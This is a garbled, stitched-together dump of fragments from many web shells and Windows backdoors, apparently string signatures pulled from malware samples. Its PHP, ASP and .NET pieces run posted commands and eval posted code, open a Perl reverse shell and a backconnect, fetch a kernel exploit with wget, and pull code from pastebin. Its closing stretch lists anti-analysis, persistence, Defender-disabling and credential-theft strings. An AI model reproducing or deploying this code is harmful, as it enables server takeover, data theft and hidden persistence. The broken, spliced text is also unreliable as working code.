size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 [==%z
1 elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 /c for /l %%i in (1,1,2) do ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%systemroot%\\temp\\_dbg.tmp%systemroot%\\syswow64\\mspool.dll%systemroot%\\system32\\dpcore16t.dll%systemroot%\\system32\\wdigestex.dll%systemroot%\\system32\\mspool.dll%systemroot%\\system32\\kernel32.dll%systemroot%\\syswow64\\iastor32.exe%systemroot%\\system32\\msvcse.exe%systemroot%\\system32\\mshtaex.exe%systemroot%\\system32\\iastor32.exe%systemroot%\\syswow64\\mshtaex.exeinstaller.exeinfo: process %serror: getfiletime %s 0x%xinstall succeedederror: regsetvalueexa 0x%xhttp://www.java.com/en/download/installed.jsp?detect=jrec
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows 